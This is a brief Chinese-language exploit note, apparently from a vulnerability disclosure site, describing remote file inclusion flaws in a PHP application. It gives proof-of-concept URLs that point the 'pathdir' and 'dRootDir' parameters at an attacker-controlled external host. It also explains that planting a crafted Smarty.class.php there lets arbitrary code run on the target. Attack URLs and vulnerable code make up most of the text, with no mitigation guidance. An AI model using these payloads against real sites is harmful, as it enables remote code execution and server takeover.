因为函数未初始化,导致函数可以任意包含文件;
1,register_global=On
2,allow_url_fopen = On
然后即可包含Poc:www.r0expeR.Net/index.php?pathdir=http://www.r0expeR.Net/xx.txt
$poc = $_GET['pathdir'];
echo require_once($poc);
poc:http://www.r0expeR.Net/index.php?pathdir=Shell
?>
inc\classes\template.php
require_once( $dRootDir."inc/classes/smarty/Smarty.class.php" );
class template extends smarty
.......
http://www.xxx.com/inc/classes/template.php?dRootDir=http://www.自己的网站.com/
在自己的网站建立 inc/classes/smarty/Smarty.class.php
代码任意写